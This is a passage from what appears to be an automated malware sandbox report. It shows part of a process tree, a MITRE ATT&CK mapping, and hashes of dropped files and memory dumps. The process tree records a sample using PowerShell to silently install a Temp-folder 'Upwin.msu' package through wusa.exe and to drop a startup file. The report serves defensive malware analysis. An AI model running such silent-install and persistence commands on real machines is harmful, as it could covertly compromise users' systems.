    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2644
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" C:\Users\Admin\AppData\Local\Temp\\Upwin.msu /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2672
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7c7658c4b50924f94268c9b4ff73d557

SHA1
1c351fd357b3f00817cd58ad46717b44d88ee5a3

SHA256
64a36eb9f5dc15067d158ef737910bc795441a777f9e92b58e5783b96625a722

SHA512
9c49088bafa7634cd30b1114354540219e95d360b084f47f87afdd8b14b2e6e159830a392ab5d387a19550fd1c1a0c35fafb1740c8b4d52b693ad56a1312ac4e

Download Submit
memory/2808-4-0x000007FEF574E000-0x000007FEF574F000-memory.dmp

Filesize
4KB

Download
memory/2808-5-0x000000001B5A0000-0x000000001B882000-memory.dmp

Filesize
2.9MB

Download
memory/2808-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2808-7-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2808-8-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2808-10-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2808-9-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2808-11-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp

Filesize
9.6MB

Download
memory/2808-29-0x000007FEF574E000-0x000007FEF574F000-memory.dmp

Filesize
4KB

Download
memory/2808-30-0x000007FEF5490000-0x000007FEF5E2D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing